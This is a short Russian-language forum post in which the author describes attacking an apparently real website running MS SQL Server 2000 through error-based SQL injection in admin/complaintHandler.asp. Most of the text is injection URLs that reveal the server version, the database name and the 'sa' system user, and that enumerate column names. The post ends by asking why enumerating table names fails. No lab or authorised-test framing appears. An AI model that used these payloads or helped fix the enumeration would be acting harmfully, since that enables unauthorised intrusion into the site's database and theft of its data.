Значит есть один уязвимый веб ресурс 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' . нашёл значит уязвимый скрипт ,вывел версию :admin/complaintHandler.asp?id=1+or+1=@@version
Имя Базы Данных текущего юзера: admin/complaintHandler.asp?id=1%20or%201=(select%20db_na me())
Имя юзера владельца данной базой: admin/complaintHandler.asp?id=1%20or%201=(select%20syste m_user)-- = 'sa'

Вроде всё окей и всё выводится , но вот когда создаю запрос :
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- то в ответ получаю Record not found: 1 or 1=1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

Зато когда создаю запрос : admin/complaintHandler.asp?id=1+or+1=(SELECT+TOP+1+colum n_NAME+FROM+INFORMATION_SCHEMA.columnS)-- колонки выводятся на ура !

Кто знает почему table_name не выводятся а с column_name всё впорядке ??